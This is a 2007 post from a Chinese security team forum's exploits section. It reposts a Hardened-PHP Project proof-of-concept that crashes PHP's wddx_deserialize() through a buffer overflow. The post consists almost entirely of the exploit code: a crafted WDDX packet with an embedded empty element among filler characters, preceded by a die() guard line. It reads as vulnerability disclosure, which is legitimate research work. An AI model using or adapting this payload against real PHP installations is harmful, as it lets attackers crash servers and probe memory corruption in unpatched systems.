邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » PHP wddx_deserialize() String Append Crash Exploit [查看完整版本]

pub!1c 2007-3-8 23:01

PHP wddx_deserialize() String Append Crash Exploit

[code]
<?php
////////////////////////////////////////////////////////////////////////
// _ _        _           _    ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _  ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || &#39;_|/ _` |/ -_)| &#39; \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_|   |_| |_||_||_|  //
//                                  //
//     Proof of concept code from the Hardened-PHP Project    //
//          (C) Copyright 2007 Stefan Esser         //
//                                  //
////////////////////////////////////////////////////////////////////////
//        PHP - wddx_deserialize() Crash Exploit       //
////////////////////////////////////////////////////////////////////////

// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");

// The following testcode will overflow the buffer with lots of C

wddx_deserialize(
  "<wddxPacket version=&#39;1.0&#39;><header/>
    <data>
      <array length=&#39;1&#39;>
        <string>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<X />CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC</string>
        <string></string>
      </array>
    </data>
  </wddxPacket>");
?>

[/code]

查看完整版本: PHP wddx_deserialize() String Append Crash Exploit

© 1999-2008 EvilOctal Security Team